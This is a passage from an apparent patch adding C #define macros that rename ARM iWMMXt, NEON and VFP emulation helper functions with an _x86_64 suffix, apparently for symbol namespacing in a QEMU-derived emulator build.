gen_helper_iwmmxt_minsw_x86_64 +#define 
gen_helper_iwmmxt_minub gen_helper_iwmmxt_minub_x86_64 +#define gen_helper_iwmmxt_minul gen_helper_iwmmxt_minul_x86_64 +#define gen_helper_iwmmxt_minuw gen_helper_iwmmxt_minuw_x86_64 +#define gen_helper_iwmmxt_msbb gen_helper_iwmmxt_msbb_x86_64 +#define gen_helper_iwmmxt_msbl gen_helper_iwmmxt_msbl_x86_64 +#define gen_helper_iwmmxt_msbw gen_helper_iwmmxt_msbw_x86_64 +#define gen_helper_iwmmxt_muladdsl gen_helper_iwmmxt_muladdsl_x86_64 +#define gen_helper_iwmmxt_muladdsw gen_helper_iwmmxt_muladdsw_x86_64 +#define gen_helper_iwmmxt_muladdswl gen_helper_iwmmxt_muladdswl_x86_64 +#define gen_helper_iwmmxt_mulshw gen_helper_iwmmxt_mulshw_x86_64 +#define gen_helper_iwmmxt_mulslw gen_helper_iwmmxt_mulslw_x86_64 +#define gen_helper_iwmmxt_muluhw gen_helper_iwmmxt_muluhw_x86_64 +#define gen_helper_iwmmxt_mululw gen_helper_iwmmxt_mululw_x86_64 +#define gen_helper_iwmmxt_packsl gen_helper_iwmmxt_packsl_x86_64 +#define gen_helper_iwmmxt_packsq gen_helper_iwmmxt_packsq_x86_64 +#define gen_helper_iwmmxt_packsw gen_helper_iwmmxt_packsw_x86_64 +#define gen_helper_iwmmxt_packul gen_helper_iwmmxt_packul_x86_64 +#define gen_helper_iwmmxt_packuq gen_helper_iwmmxt_packuq_x86_64 +#define gen_helper_iwmmxt_packuw gen_helper_iwmmxt_packuw_x86_64 +#define gen_helper_iwmmxt_rorl gen_helper_iwmmxt_rorl_x86_64 +#define gen_helper_iwmmxt_rorq gen_helper_iwmmxt_rorq_x86_64 +#define gen_helper_iwmmxt_rorw gen_helper_iwmmxt_rorw_x86_64 +#define gen_helper_iwmmxt_sadb gen_helper_iwmmxt_sadb_x86_64 +#define gen_helper_iwmmxt_sadw gen_helper_iwmmxt_sadw_x86_64 +#define gen_helper_iwmmxt_setpsr_nz gen_helper_iwmmxt_setpsr_nz_x86_64 +#define gen_helper_iwmmxt_shufh gen_helper_iwmmxt_shufh_x86_64 +#define gen_helper_iwmmxt_slll gen_helper_iwmmxt_slll_x86_64 +#define gen_helper_iwmmxt_sllq gen_helper_iwmmxt_sllq_x86_64 +#define gen_helper_iwmmxt_sllw gen_helper_iwmmxt_sllw_x86_64 +#define gen_helper_iwmmxt_sral gen_helper_iwmmxt_sral_x86_64 +#define gen_helper_iwmmxt_sraq gen_helper_iwmmxt_sraq_x86_64 
+#define gen_helper_iwmmxt_sraw gen_helper_iwmmxt_sraw_x86_64 +#define gen_helper_iwmmxt_srll gen_helper_iwmmxt_srll_x86_64 +#define gen_helper_iwmmxt_srlq gen_helper_iwmmxt_srlq_x86_64 +#define gen_helper_iwmmxt_srlw gen_helper_iwmmxt_srlw_x86_64 +#define gen_helper_iwmmxt_subnb gen_helper_iwmmxt_subnb_x86_64 +#define gen_helper_iwmmxt_subnl gen_helper_iwmmxt_subnl_x86_64 +#define gen_helper_iwmmxt_subnw gen_helper_iwmmxt_subnw_x86_64 +#define gen_helper_iwmmxt_subsb gen_helper_iwmmxt_subsb_x86_64 +#define gen_helper_iwmmxt_subsl gen_helper_iwmmxt_subsl_x86_64 +#define gen_helper_iwmmxt_subsw gen_helper_iwmmxt_subsw_x86_64 +#define gen_helper_iwmmxt_subub gen_helper_iwmmxt_subub_x86_64 +#define gen_helper_iwmmxt_subul gen_helper_iwmmxt_subul_x86_64 +#define gen_helper_iwmmxt_subuw gen_helper_iwmmxt_subuw_x86_64 +#define gen_helper_iwmmxt_unpackhb gen_helper_iwmmxt_unpackhb_x86_64 +#define gen_helper_iwmmxt_unpackhl gen_helper_iwmmxt_unpackhl_x86_64 +#define gen_helper_iwmmxt_unpackhsb gen_helper_iwmmxt_unpackhsb_x86_64 +#define gen_helper_iwmmxt_unpackhsl gen_helper_iwmmxt_unpackhsl_x86_64 +#define gen_helper_iwmmxt_unpackhsw gen_helper_iwmmxt_unpackhsw_x86_64 +#define gen_helper_iwmmxt_unpackhub gen_helper_iwmmxt_unpackhub_x86_64 +#define gen_helper_iwmmxt_unpackhul gen_helper_iwmmxt_unpackhul_x86_64 +#define gen_helper_iwmmxt_unpackhuw gen_helper_iwmmxt_unpackhuw_x86_64 +#define gen_helper_iwmmxt_unpackhw gen_helper_iwmmxt_unpackhw_x86_64 +#define gen_helper_iwmmxt_unpacklb gen_helper_iwmmxt_unpacklb_x86_64 +#define gen_helper_iwmmxt_unpackll gen_helper_iwmmxt_unpackll_x86_64 +#define gen_helper_iwmmxt_unpacklsb gen_helper_iwmmxt_unpacklsb_x86_64 +#define gen_helper_iwmmxt_unpacklsl gen_helper_iwmmxt_unpacklsl_x86_64 +#define gen_helper_iwmmxt_unpacklsw gen_helper_iwmmxt_unpacklsw_x86_64 +#define gen_helper_iwmmxt_unpacklub gen_helper_iwmmxt_unpacklub_x86_64 +#define gen_helper_iwmmxt_unpacklul gen_helper_iwmmxt_unpacklul_x86_64 +#define 
gen_helper_iwmmxt_unpackluw gen_helper_iwmmxt_unpackluw_x86_64 +#define gen_helper_iwmmxt_unpacklw gen_helper_iwmmxt_unpacklw_x86_64 +#define gen_helper_neon_abd_f32 gen_helper_neon_abd_f32_x86_64 +#define gen_helper_neon_abdl_s16 gen_helper_neon_abdl_s16_x86_64 +#define gen_helper_neon_abdl_s32 gen_helper_neon_abdl_s32_x86_64 +#define gen_helper_neon_abdl_s64 gen_helper_neon_abdl_s64_x86_64 +#define gen_helper_neon_abdl_u16 gen_helper_neon_abdl_u16_x86_64 +#define gen_helper_neon_abdl_u32 gen_helper_neon_abdl_u32_x86_64 +#define gen_helper_neon_abdl_u64 gen_helper_neon_abdl_u64_x86_64 +#define gen_helper_neon_abd_s16 gen_helper_neon_abd_s16_x86_64 +#define gen_helper_neon_abd_s32 gen_helper_neon_abd_s32_x86_64 +#define gen_helper_neon_abd_s8 gen_helper_neon_abd_s8_x86_64 +#define gen_helper_neon_abd_u16 gen_helper_neon_abd_u16_x86_64 +#define gen_helper_neon_abd_u32 gen_helper_neon_abd_u32_x86_64 +#define gen_helper_neon_abd_u8 gen_helper_neon_abd_u8_x86_64 +#define gen_helper_neon_abs_s16 gen_helper_neon_abs_s16_x86_64 +#define gen_helper_neon_abs_s8 gen_helper_neon_abs_s8_x86_64 +#define gen_helper_neon_acge_f32 gen_helper_neon_acge_f32_x86_64 +#define gen_helper_neon_acgt_f32 gen_helper_neon_acgt_f32_x86_64 +#define gen_helper_neon_addl_saturate_s32 gen_helper_neon_addl_saturate_s32_x86_64 +#define gen_helper_neon_addl_saturate_s64 gen_helper_neon_addl_saturate_s64_x86_64 +#define gen_helper_neon_addl_u16 gen_helper_neon_addl_u16_x86_64 +#define gen_helper_neon_addl_u32 gen_helper_neon_addl_u32_x86_64 +#define gen_helper_neon_add_u16 gen_helper_neon_add_u16_x86_64 +#define gen_helper_neon_add_u8 gen_helper_neon_add_u8_x86_64 +#define gen_helper_neon_ceq_f32 gen_helper_neon_ceq_f32_x86_64 +#define gen_helper_neon_ceq_u16 gen_helper_neon_ceq_u16_x86_64 +#define gen_helper_neon_ceq_u32 gen_helper_neon_ceq_u32_x86_64 +#define gen_helper_neon_ceq_u8 gen_helper_neon_ceq_u8_x86_64 +#define gen_helper_neon_cge_f32 gen_helper_neon_cge_f32_x86_64 +#define 
gen_helper_neon_cge_s16 gen_helper_neon_cge_s16_x86_64 +#define gen_helper_neon_cge_s32 gen_helper_neon_cge_s32_x86_64 +#define gen_helper_neon_cge_s8 gen_helper_neon_cge_s8_x86_64 +#define gen_helper_neon_cge_u16 gen_helper_neon_cge_u16_x86_64 +#define gen_helper_neon_cge_u32 gen_helper_neon_cge_u32_x86_64 +#define gen_helper_neon_cge_u8 gen_helper_neon_cge_u8_x86_64 +#define gen_helper_neon_cgt_f32 gen_helper_neon_cgt_f32_x86_64 +#define gen_helper_neon_cgt_s16 gen_helper_neon_cgt_s16_x86_64 +#define gen_helper_neon_cgt_s32 gen_helper_neon_cgt_s32_x86_64 +#define gen_helper_neon_cgt_s8 gen_helper_neon_cgt_s8_x86_64 +#define gen_helper_neon_cgt_u16 gen_helper_neon_cgt_u16_x86_64 +#define gen_helper_neon_cgt_u32 gen_helper_neon_cgt_u32_x86_64 +#define gen_helper_neon_cgt_u8 gen_helper_neon_cgt_u8_x86_64 +#define gen_helper_neon_cls_s16 gen_helper_neon_cls_s16_x86_64 +#define gen_helper_neon_cls_s32 gen_helper_neon_cls_s32_x86_64 +#define gen_helper_neon_cls_s8 gen_helper_neon_cls_s8_x86_64 +#define gen_helper_neon_clz_u16 gen_helper_neon_clz_u16_x86_64 +#define gen_helper_neon_clz_u8 gen_helper_neon_clz_u8_x86_64 +#define gen_helper_neon_cnt_u8 gen_helper_neon_cnt_u8_x86_64 +#define gen_helper_neon_fcvt_f16_to_f32 gen_helper_neon_fcvt_f16_to_f32_x86_64 +#define gen_helper_neon_fcvt_f32_to_f16 gen_helper_neon_fcvt_f32_to_f16_x86_64 +#define gen_helper_neon_hadd_s16 gen_helper_neon_hadd_s16_x86_64 +#define gen_helper_neon_hadd_s32 gen_helper_neon_hadd_s32_x86_64 +#define gen_helper_neon_hadd_s8 gen_helper_neon_hadd_s8_x86_64 +#define gen_helper_neon_hadd_u16 gen_helper_neon_hadd_u16_x86_64 +#define gen_helper_neon_hadd_u32 gen_helper_neon_hadd_u32_x86_64 +#define gen_helper_neon_hadd_u8 gen_helper_neon_hadd_u8_x86_64 +#define gen_helper_neon_hsub_s16 gen_helper_neon_hsub_s16_x86_64 +#define gen_helper_neon_hsub_s32 gen_helper_neon_hsub_s32_x86_64 +#define gen_helper_neon_hsub_s8 gen_helper_neon_hsub_s8_x86_64 +#define gen_helper_neon_hsub_u16 
gen_helper_neon_hsub_u16_x86_64 +#define gen_helper_neon_hsub_u32 gen_helper_neon_hsub_u32_x86_64 +#define gen_helper_neon_hsub_u8 gen_helper_neon_hsub_u8_x86_64 +#define gen_helper_neon_max_s16 gen_helper_neon_max_s16_x86_64 +#define gen_helper_neon_max_s32 gen_helper_neon_max_s32_x86_64 +#define gen_helper_neon_max_s8 gen_helper_neon_max_s8_x86_64 +#define gen_helper_neon_max_u16 gen_helper_neon_max_u16_x86_64 +#define gen_helper_neon_max_u32 gen_helper_neon_max_u32_x86_64 +#define gen_helper_neon_max_u8 gen_helper_neon_max_u8_x86_64 +#define gen_helper_neon_min_s16 gen_helper_neon_min_s16_x86_64 +#define gen_helper_neon_min_s32 gen_helper_neon_min_s32_x86_64 +#define gen_helper_neon_min_s8 gen_helper_neon_min_s8_x86_64 +#define gen_helper_neon_min_u16 gen_helper_neon_min_u16_x86_64 +#define gen_helper_neon_min_u32 gen_helper_neon_min_u32_x86_64 +#define gen_helper_neon_min_u8 gen_helper_neon_min_u8_x86_64 +#define gen_helper_neon_mull_p8 gen_helper_neon_mull_p8_x86_64 +#define gen_helper_neon_mull_s16 gen_helper_neon_mull_s16_x86_64 +#define gen_helper_neon_mull_s8 gen_helper_neon_mull_s8_x86_64 +#define gen_helper_neon_mull_u16 gen_helper_neon_mull_u16_x86_64 +#define gen_helper_neon_mull_u8 gen_helper_neon_mull_u8_x86_64 +#define gen_helper_neon_mul_p8 gen_helper_neon_mul_p8_x86_64 +#define gen_helper_neon_mul_u16 gen_helper_neon_mul_u16_x86_64 +#define gen_helper_neon_mul_u8 gen_helper_neon_mul_u8_x86_64 +#define gen_helper_neon_narrow_high_u16 gen_helper_neon_narrow_high_u16_x86_64 +#define gen_helper_neon_narrow_high_u8 gen_helper_neon_narrow_high_u8_x86_64 +#define gen_helper_neon_narrow_round_high_u16 gen_helper_neon_narrow_round_high_u16_x86_64 +#define gen_helper_neon_narrow_round_high_u8 gen_helper_neon_narrow_round_high_u8_x86_64 +#define gen_helper_neon_narrow_sat_s16 gen_helper_neon_narrow_sat_s16_x86_64 +#define gen_helper_neon_narrow_sat_s32 gen_helper_neon_narrow_sat_s32_x86_64 +#define gen_helper_neon_narrow_sat_s8 
gen_helper_neon_narrow_sat_s8_x86_64 +#define gen_helper_neon_narrow_sat_u16 gen_helper_neon_narrow_sat_u16_x86_64 +#define gen_helper_neon_narrow_sat_u32 gen_helper_neon_narrow_sat_u32_x86_64 +#define gen_helper_neon_narrow_sat_u8 gen_helper_neon_narrow_sat_u8_x86_64 +#define gen_helper_neon_narrow_u16 gen_helper_neon_narrow_u16_x86_64 +#define gen_helper_neon_narrow_u8 gen_helper_neon_narrow_u8_x86_64 +#define gen_helper_neon_negl_u16 gen_helper_neon_negl_u16_x86_64 +#define gen_helper_neon_negl_u32 gen_helper_neon_negl_u32_x86_64 +#define gen_helper_neon_paddl_u16 gen_helper_neon_paddl_u16_x86_64 +#define gen_helper_neon_paddl_u32 gen_helper_neon_paddl_u32_x86_64 +#define gen_helper_neon_padd_u16 gen_helper_neon_padd_u16_x86_64 +#define gen_helper_neon_padd_u8 gen_helper_neon_padd_u8_x86_64 +#define gen_helper_neon_pmax_s16 gen_helper_neon_pmax_s16_x86_64 +#define gen_helper_neon_pmax_s8 gen_helper_neon_pmax_s8_x86_64 +#define gen_helper_neon_pmax_u16 gen_helper_neon_pmax_u16_x86_64 +#define gen_helper_neon_pmax_u8 gen_helper_neon_pmax_u8_x86_64 +#define gen_helper_neon_pmin_s16 gen_helper_neon_pmin_s16_x86_64 +#define gen_helper_neon_pmin_s8 gen_helper_neon_pmin_s8_x86_64 +#define gen_helper_neon_pmin_u16 gen_helper_neon_pmin_u16_x86_64 +#define gen_helper_neon_pmin_u8 gen_helper_neon_pmin_u8_x86_64 +#define gen_helper_neon_pmull_64_hi gen_helper_neon_pmull_64_hi_x86_64 +#define gen_helper_neon_pmull_64_lo gen_helper_neon_pmull_64_lo_x86_64 +#define gen_helper_neon_qabs_s16 gen_helper_neon_qabs_s16_x86_64 +#define gen_helper_neon_qabs_s32 gen_helper_neon_qabs_s32_x86_64 +#define gen_helper_neon_qabs_s8 gen_helper_neon_qabs_s8_x86_64 +#define gen_helper_neon_qadd_s16 gen_helper_neon_qadd_s16_x86_64 +#define gen_helper_neon_qadd_s32 gen_helper_neon_qadd_s32_x86_64 +#define gen_helper_neon_qadd_s64 gen_helper_neon_qadd_s64_x86_64 +#define gen_helper_neon_qadd_s8 gen_helper_neon_qadd_s8_x86_64 +#define gen_helper_neon_qadd_u16 gen_helper_neon_qadd_u16_x86_64 
+#define gen_helper_neon_qadd_u32 gen_helper_neon_qadd_u32_x86_64 +#define gen_helper_neon_qadd_u64 gen_helper_neon_qadd_u64_x86_64 +#define gen_helper_neon_qadd_u8 gen_helper_neon_qadd_u8_x86_64 +#define gen_helper_neon_qdmulh_s16 gen_helper_neon_qdmulh_s16_x86_64 +#define gen_helper_neon_qdmulh_s32 gen_helper_neon_qdmulh_s32_x86_64 +#define gen_helper_neon_qneg_s16 gen_helper_neon_qneg_s16_x86_64 +#define gen_helper_neon_qneg_s32 gen_helper_neon_qneg_s32_x86_64 +#define gen_helper_neon_qneg_s8 gen_helper_neon_qneg_s8_x86_64 +#define gen_helper_neon_qrdmulh_s16 gen_helper_neon_qrdmulh_s16_x86_64 +#define gen_helper_neon_qrdmulh_s32 gen_helper_neon_qrdmulh_s32_x86_64 +#define gen_helper_neon_qrshl_s16 gen_helper_neon_qrshl_s16_x86_64 +#define gen_helper_neon_qrshl_s32 gen_helper_neon_qrshl_s32_x86_64 +#define gen_helper_neon_qrshl_s64 gen_helper_neon_qrshl_s64_x86_64 +#define gen_helper_neon_qrshl_s8 gen_helper_neon_qrshl_s8_x86_64 +#define gen_helper_neon_qrshl_u16 gen_helper_neon_qrshl_u16_x86_64 +#define gen_helper_neon_qrshl_u32 gen_helper_neon_qrshl_u32_x86_64 +#define gen_helper_neon_qrshl_u64 gen_helper_neon_qrshl_u64_x86_64 +#define gen_helper_neon_qrshl_u8 gen_helper_neon_qrshl_u8_x86_64 +#define gen_helper_neon_qshl_s16 gen_helper_neon_qshl_s16_x86_64 +#define gen_helper_neon_qshl_s32 gen_helper_neon_qshl_s32_x86_64 +#define gen_helper_neon_qshl_s64 gen_helper_neon_qshl_s64_x86_64 +#define gen_helper_neon_qshl_s8 gen_helper_neon_qshl_s8_x86_64 +#define gen_helper_neon_qshl_u16 gen_helper_neon_qshl_u16_x86_64 +#define gen_helper_neon_qshl_u32 gen_helper_neon_qshl_u32_x86_64 +#define gen_helper_neon_qshl_u64 gen_helper_neon_qshl_u64_x86_64 +#define gen_helper_neon_qshl_u8 gen_helper_neon_qshl_u8_x86_64 +#define gen_helper_neon_qshlu_s16 gen_helper_neon_qshlu_s16_x86_64 +#define gen_helper_neon_qshlu_s32 gen_helper_neon_qshlu_s32_x86_64 +#define gen_helper_neon_qshlu_s64 gen_helper_neon_qshlu_s64_x86_64 +#define gen_helper_neon_qshlu_s8 
gen_helper_neon_qshlu_s8_x86_64 +#define gen_helper_neon_qsub_s16 gen_helper_neon_qsub_s16_x86_64 +#define gen_helper_neon_qsub_s32 gen_helper_neon_qsub_s32_x86_64 +#define gen_helper_neon_qsub_s64 gen_helper_neon_qsub_s64_x86_64 +#define gen_helper_neon_qsub_s8 gen_helper_neon_qsub_s8_x86_64 +#define gen_helper_neon_qsub_u16 gen_helper_neon_qsub_u16_x86_64 +#define gen_helper_neon_qsub_u32 gen_helper_neon_qsub_u32_x86_64 +#define gen_helper_neon_qsub_u64 gen_helper_neon_qsub_u64_x86_64 +#define gen_helper_neon_qsub_u8 gen_helper_neon_qsub_u8_x86_64 +#define gen_helper_neon_qunzip16 gen_helper_neon_qunzip16_x86_64 +#define gen_helper_neon_qunzip32 gen_helper_neon_qunzip32_x86_64 +#define gen_helper_neon_qunzip8 gen_helper_neon_qunzip8_x86_64 +#define gen_helper_neon_qzip16 gen_helper_neon_qzip16_x86_64 +#define gen_helper_neon_qzip32 gen_helper_neon_qzip32_x86_64 +#define gen_helper_neon_qzip8 gen_helper_neon_qzip8_x86_64 +#define gen_helper_neon_rhadd_s16 gen_helper_neon_rhadd_s16_x86_64 +#define gen_helper_neon_rhadd_s32 gen_helper_neon_rhadd_s32_x86_64 +#define gen_helper_neon_rhadd_s8 gen_helper_neon_rhadd_s8_x86_64 +#define gen_helper_neon_rhadd_u16 gen_helper_neon_rhadd_u16_x86_64 +#define gen_helper_neon_rhadd_u32 gen_helper_neon_rhadd_u32_x86_64 +#define gen_helper_neon_rhadd_u8 gen_helper_neon_rhadd_u8_x86_64 +#define gen_helper_neon_rshl_s16 gen_helper_neon_rshl_s16_x86_64 +#define gen_helper_neon_rshl_s32 gen_helper_neon_rshl_s32_x86_64 +#define gen_helper_neon_rshl_s64 gen_helper_neon_rshl_s64_x86_64 +#define gen_helper_neon_rshl_s8 gen_helper_neon_rshl_s8_x86_64 +#define gen_helper_neon_rshl_u16 gen_helper_neon_rshl_u16_x86_64 +#define gen_helper_neon_rshl_u32 gen_helper_neon_rshl_u32_x86_64 +#define gen_helper_neon_rshl_u64 gen_helper_neon_rshl_u64_x86_64 +#define gen_helper_neon_rshl_u8 gen_helper_neon_rshl_u8_x86_64 +#define gen_helper_neon_shl_s16 gen_helper_neon_shl_s16_x86_64 +#define gen_helper_neon_shl_s32 gen_helper_neon_shl_s32_x86_64 
+#define gen_helper_neon_shl_s64 gen_helper_neon_shl_s64_x86_64 +#define gen_helper_neon_shl_s8 gen_helper_neon_shl_s8_x86_64 +#define gen_helper_neon_shl_u16 gen_helper_neon_shl_u16_x86_64 +#define gen_helper_neon_shl_u32 gen_helper_neon_shl_u32_x86_64 +#define gen_helper_neon_shl_u64 gen_helper_neon_shl_u64_x86_64 +#define gen_helper_neon_shl_u8 gen_helper_neon_shl_u8_x86_64 +#define gen_helper_neon_subl_u16 gen_helper_neon_subl_u16_x86_64 +#define gen_helper_neon_subl_u32 gen_helper_neon_subl_u32_x86_64 +#define gen_helper_neon_sub_u16 gen_helper_neon_sub_u16_x86_64 +#define gen_helper_neon_sub_u8 gen_helper_neon_sub_u8_x86_64 +#define gen_helper_neon_tbl gen_helper_neon_tbl_x86_64 +#define gen_helper_neon_tst_u16 gen_helper_neon_tst_u16_x86_64 +#define gen_helper_neon_tst_u32 gen_helper_neon_tst_u32_x86_64 +#define gen_helper_neon_tst_u8 gen_helper_neon_tst_u8_x86_64 +#define gen_helper_neon_unarrow_sat16 gen_helper_neon_unarrow_sat16_x86_64 +#define gen_helper_neon_unarrow_sat32 gen_helper_neon_unarrow_sat32_x86_64 +#define gen_helper_neon_unarrow_sat8 gen_helper_neon_unarrow_sat8_x86_64 +#define gen_helper_neon_unzip16 gen_helper_neon_unzip16_x86_64 +#define gen_helper_neon_unzip8 gen_helper_neon_unzip8_x86_64 +#define gen_helper_neon_widen_s16 gen_helper_neon_widen_s16_x86_64 +#define gen_helper_neon_widen_s8 gen_helper_neon_widen_s8_x86_64 +#define gen_helper_neon_widen_u16 gen_helper_neon_widen_u16_x86_64 +#define gen_helper_neon_widen_u8 gen_helper_neon_widen_u8_x86_64 +#define gen_helper_neon_zip16 gen_helper_neon_zip16_x86_64 +#define gen_helper_neon_zip8 gen_helper_neon_zip8_x86_64 +#define gen_helper_pre_hvc gen_helper_pre_hvc_x86_64 +#define gen_helper_pre_smc gen_helper_pre_smc_x86_64 +#define gen_helper_qadd16 gen_helper_qadd16_x86_64 +#define gen_helper_qadd8 gen_helper_qadd8_x86_64 +#define gen_helper_qaddsubx gen_helper_qaddsubx_x86_64 +#define gen_helper_qsub16 gen_helper_qsub16_x86_64 +#define gen_helper_qsub8 gen_helper_qsub8_x86_64 +#define 
gen_helper_qsubaddx gen_helper_qsubaddx_x86_64 +#define gen_helper_rbit gen_helper_rbit_x86_64 +#define gen_helper_recpe_f32 gen_helper_recpe_f32_x86_64 +#define gen_helper_recpe_u32 gen_helper_recpe_u32_x86_64 +#define gen_helper_recps_f32 gen_helper_recps_f32_x86_64 +#define gen_helper_rintd gen_helper_rintd_x86_64 +#define gen_helper_rintd_exact gen_helper_rintd_exact_x86_64 +#define gen_helper_rints gen_helper_rints_x86_64 +#define gen_helper_rints_exact gen_helper_rints_exact_x86_64 +#define gen_helper_ror_cc gen_helper_ror_cc_x86_64 +#define gen_helper_rsqrte_f32 gen_helper_rsqrte_f32_x86_64 +#define gen_helper_rsqrte_u32 gen_helper_rsqrte_u32_x86_64 +#define gen_helper_rsqrts_f32 gen_helper_rsqrts_f32_x86_64 +#define gen_helper_sadd16 gen_helper_sadd16_x86_64 +#define gen_helper_sadd8 gen_helper_sadd8_x86_64 +#define gen_helper_saddsubx gen_helper_saddsubx_x86_64 +#define gen_helper_sar_cc gen_helper_sar_cc_x86_64 +#define gen_helper_sdiv gen_helper_sdiv_x86_64 +#define gen_helper_sel_flags gen_helper_sel_flags_x86_64 +#define gen_helper_set_cp_reg gen_helper_set_cp_reg_x86_64 +#define gen_helper_set_cp_reg64 gen_helper_set_cp_reg64_x86_64 +#define gen_helper_set_neon_rmode gen_helper_set_neon_rmode_x86_64 +#define gen_helper_set_r13_banked gen_helper_set_r13_banked_x86_64 +#define gen_helper_set_rmode gen_helper_set_rmode_x86_64 +#define gen_helper_set_user_reg gen_helper_set_user_reg_x86_64 +#define gen_helper_shadd16 gen_helper_shadd16_x86_64 +#define gen_helper_shadd8 gen_helper_shadd8_x86_64 +#define gen_helper_shaddsubx gen_helper_shaddsubx_x86_64 +#define gen_helper_shl_cc gen_helper_shl_cc_x86_64 +#define gen_helper_shr_cc gen_helper_shr_cc_x86_64 +#define gen_helper_shsub16 gen_helper_shsub16_x86_64 +#define gen_helper_shsub8 gen_helper_shsub8_x86_64 +#define gen_helper_shsubaddx gen_helper_shsubaddx_x86_64 +#define gen_helper_ssat gen_helper_ssat_x86_64 +#define gen_helper_ssat16 gen_helper_ssat16_x86_64 +#define gen_helper_ssub16 
gen_helper_ssub16_x86_64 +#define gen_helper_ssub8 gen_helper_ssub8_x86_64 +#define gen_helper_ssubaddx gen_helper_ssubaddx_x86_64 +#define gen_helper_sub_saturate gen_helper_sub_saturate_x86_64 +#define gen_helper_sxtb16 gen_helper_sxtb16_x86_64 +#define gen_helper_uadd16 gen_helper_uadd16_x86_64 +#define gen_helper_uadd8 gen_helper_uadd8_x86_64 +#define gen_helper_uaddsubx gen_helper_uaddsubx_x86_64 +#define gen_helper_udiv gen_helper_udiv_x86_64 +#define gen_helper_uhadd16 gen_helper_uhadd16_x86_64 +#define gen_helper_uhadd8 gen_helper_uhadd8_x86_64 +#define gen_helper_uhaddsubx gen_helper_uhaddsubx_x86_64 +#define gen_helper_uhsub16 gen_helper_uhsub16_x86_64 +#define gen_helper_uhsub8 gen_helper_uhsub8_x86_64 +#define gen_helper_uhsubaddx gen_helper_uhsubaddx_x86_64 +#define gen_helper_uqadd16 gen_helper_uqadd16_x86_64 +#define gen_helper_uqadd8 gen_helper_uqadd8_x86_64 +#define gen_helper_uqaddsubx gen_helper_uqaddsubx_x86_64 +#define gen_helper_uqsub16 gen_helper_uqsub16_x86_64 +#define gen_helper_uqsub8 gen_helper_uqsub8_x86_64 +#define gen_helper_uqsubaddx gen_helper_uqsubaddx_x86_64 +#define gen_helper_usad8 gen_helper_usad8_x86_64 +#define gen_helper_usat gen_helper_usat_x86_64 +#define gen_helper_usat16 gen_helper_usat16_x86_64 +#define gen_helper_usub16 gen_helper_usub16_x86_64 +#define gen_helper_usub8 gen_helper_usub8_x86_64 +#define gen_helper_usubaddx gen_helper_usubaddx_x86_64 +#define gen_helper_uxtb16 gen_helper_uxtb16_x86_64 +#define gen_helper_v7m_mrs gen_helper_v7m_mrs_x86_64 +#define gen_helper_v7m_msr gen_helper_v7m_msr_x86_64 +#define gen_helper_vfp_absd gen_helper_vfp_absd_x86_64 +#define gen_helper_vfp_abss gen_helper_vfp_abss_x86_64 +#define gen_helper_vfp_addd gen_helper_vfp_addd_x86_64 +#define gen_helper_vfp_adds gen_helper_vfp_adds_x86_64 +#define gen_helper_vfp_cmpd gen_helper_vfp_cmpd_x86_64 +#define gen_helper_vfp_cmped gen_helper_vfp_cmped_x86_64 +#define gen_helper_vfp_cmpes gen_helper_vfp_cmpes_x86_64 +#define 
gen_helper_vfp_cmps gen_helper_vfp_cmps_x86_64 +#define gen_helper_vfp_divd gen_helper_vfp_divd_x86_64 +#define gen_helper_vfp_divs gen_helper_vfp_divs_x86_64 +#define gen_helper_vfp_fcvtds gen_helper_vfp_fcvtds_x86_64 +#define gen_helper_vfp_fcvt_f16_to_f32 gen_helper_vfp_fcvt_f16_to_f32_x86_64 +#define gen_helper_vfp_fcvt_f16_to_f64 gen_helper_vfp_fcvt_f16_to_f64_x86_64 +#define gen_helper_vfp_fcvt_f32_to_f16 gen_helper_vfp_fcvt_f32_to_f16_x86_64 +#define gen_helper_vfp_fcvt_f64_to_f16 gen_helper_vfp_fcvt_f64_to_f16_x86_64 +#define gen_helper_vfp_fcvtsd gen_helper_vfp_fcvtsd_x86_64 +#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_x86_64 +#define gen_helper_vfp_maxnumd gen_helper_vfp_maxnumd_x86_64 +#define gen_helper_vfp_maxnums gen_helper_vfp_maxnums_x86_64 +#define gen_helper_vfp_maxs gen_helper_vfp_maxs_x86_64 +#define gen_helper_vfp_minnumd gen_helper_vfp_minnumd_x86_64 +#define gen_helper_vfp_minnums gen_helper_vfp_minnums_x86_64 +#define gen_helper_vfp_mins gen_helper_vfp_mins_x86_64 +#define gen_helper_vfp_muladdd gen_helper_vfp_muladdd_x86_64 +#define gen_helper_vfp_muladds gen_helper_vfp_muladds_x86_64 +#define gen_helper_vfp_muld gen_helper_vfp_muld_x86_64 +#define gen_helper_vfp_muls gen_helper_vfp_muls_x86_64 +#define gen_helper_vfp_negd gen_helper_vfp_negd_x86_64 +#define gen_helper_vfp_negs gen_helper_vfp_negs_x86_64 +#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_x86_64 +#define gen_helper_vfp_shtod gen_helper_vfp_shtod_x86_64 +#define gen_helper_vfp_shtos gen_helper_vfp_shtos_x86_64 +#define gen_helper_vfp_sitod gen_helper_vfp_sitod_x86_64 +#define gen_helper_vfp_sitos gen_helper_vfp_sitos_x86_64 +#define gen_helper_vfp_sltod gen_helper_vfp_sltod_x86_64 +#define gen_helper_vfp_sltos gen_helper_vfp_sltos_x86_64 +#define gen_helper_vfp_sqrtd gen_helper_vfp_sqrtd_x86_64 +#define gen_helper_vfp_sqrts gen_helper_vfp_sqrts_x86_64 +#define gen_helper_vfp_subd gen_helper_vfp_subd_x86_64 +#define gen_helper_vfp_subs 
gen_helper_vfp_subs_x86_64 +#define gen_helper_vfp_toshd_round_to_zero gen_helper_vfp_toshd_round_to_zero_x86_64 +#define gen_helper_vfp_toshs_round_to_zero gen_helper_vfp_toshs_round_to_zero_x86_64 +#define gen_helper_vfp_tosid gen_helper_vfp_tosid_x86_64 +#define gen_helper_vfp_tosis gen_helper_vfp_tosis_x86_64 +#define gen_helper_vfp_tosizd gen_helper_vfp_tosizd_x86_64 +#define gen_helper_vfp_tosizs gen_helper_vfp_tosizs_x86_64 +#define gen_helper_vfp_tosld gen_helper_vfp_tosld_x86_64 +#define gen_helper_vfp_tosld_round_to_zero gen_helper_vfp_tosld_round_to_zero_x86_64 +#define gen_helper_vfp_tosls gen_helper_vfp_tosls_x86_64 +#define gen_helper_vfp_tosls_round_to_zero gen_helper_vfp_tosls_round_to_zero_x86_64 +#define gen_helper_vfp_touhd_round_to_zero gen_helper_vfp_touhd_round_to_zero_x86_64 +#define gen_helper_vfp_touhs_round_to_zero gen_helper_vfp_touhs_round_to_zero_x86_64 +#define 